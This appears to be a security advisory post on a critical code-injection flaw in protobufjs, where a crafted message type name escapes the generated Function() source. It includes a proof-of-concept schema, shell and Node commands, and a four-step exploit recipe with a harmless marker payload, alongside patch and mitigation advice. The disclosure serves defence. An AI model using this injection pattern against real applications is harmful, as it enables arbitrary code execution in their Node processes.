Listen to this Post
The vulnerability resides in the `codegen` module used by `protobufjs` to compile Protocol Buffer schemas into JavaScript functions. The module builds these functions by concatenating strings and then passing the result to the `Function()` constructor.
Specifically, when generating code for a new type (e.g., a message), the library unsafely concatenates the type’s name directly into the string that becomes the constructor’s source code. An attacker can supply a crafted schema containing a malicious type name that, when inserted, breaks out of the intended function declaration and injects arbitrary JavaScript.
For example, a type name like `X(p){PAYLOAD};if(true){//` is inserted directly. The code generator builds the string:
`return function X(p){PAYLOAD};if(true){//(p){ … }`
When this string is executed via the `Function()` constructor, the returned function’s body is the injected PAYLOAD, and the rest of the original logic is commented out or placed inside an inert block. The injected code runs with the full privileges of the Node.js process as soon as the type constructor is called, such as when a message is created or decoded.
The vulnerability affects static code generation (pbjs) and runtime descriptor loading. All versions prior to 8.0.1 and 7.5.5 are vulnerable. The fix, released in version 8.0.1 and backported to 7.5.5, sanitizes type names to prevent injection.
Platform: protobufjs Version: <8.0.1,<7.5.5 Vulnerability: Code Injection Severity: Critical date: 2026-04-18 Prediction: Patched 2026-04-18
Analytics under heading What Undercode Say:
Check vulnerable version:
npm list protobufjs
Generate static code with malicious input:
echo '{"nested":{"X(p){globalThis.PWNED=1};if(true){//":{"fields":{"a":{"type":"string","id":1}}}}}' > bad.json
pbjs bad.json --target=static-module > evil.js
Verify injection in vulnerable environment:
const protobuf = require("protobufjs");
protobuf.Root.fromJSON({
nested: {
"X(p){globalThis.PWNED=1};if(true){//": {
fields: { x: { type: "string", id: 1 } }
}
}
});
console.log(globalThis.PWNED); // shows "1"
Exploit:
1. Craft JSON descriptor containing type name `X(p){PAYLOAD};if(true){//`.
2. Load descriptor via `protobuf.Root.fromJSON()`.
3. Call `new ctor()` or `T.create()`.
4. Injected `PAYLOAD` executes with full Node privileges.
Protection from this CVE
- Upgrade to protobufjs 8.0.1 or 7.5.5.
- Do not load schemas from untrusted sources.
- Validate/sanitize type names before code generation.
- Run generation in isolated environment.
Impact
Remote attacker can execute arbitrary JavaScript in Node.js process. May lead to full system compromise, data breach, or lateral movement. Critical with CVSS 4.0 score of 9.4. All applications processing untrusted protobuf schemas are at risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

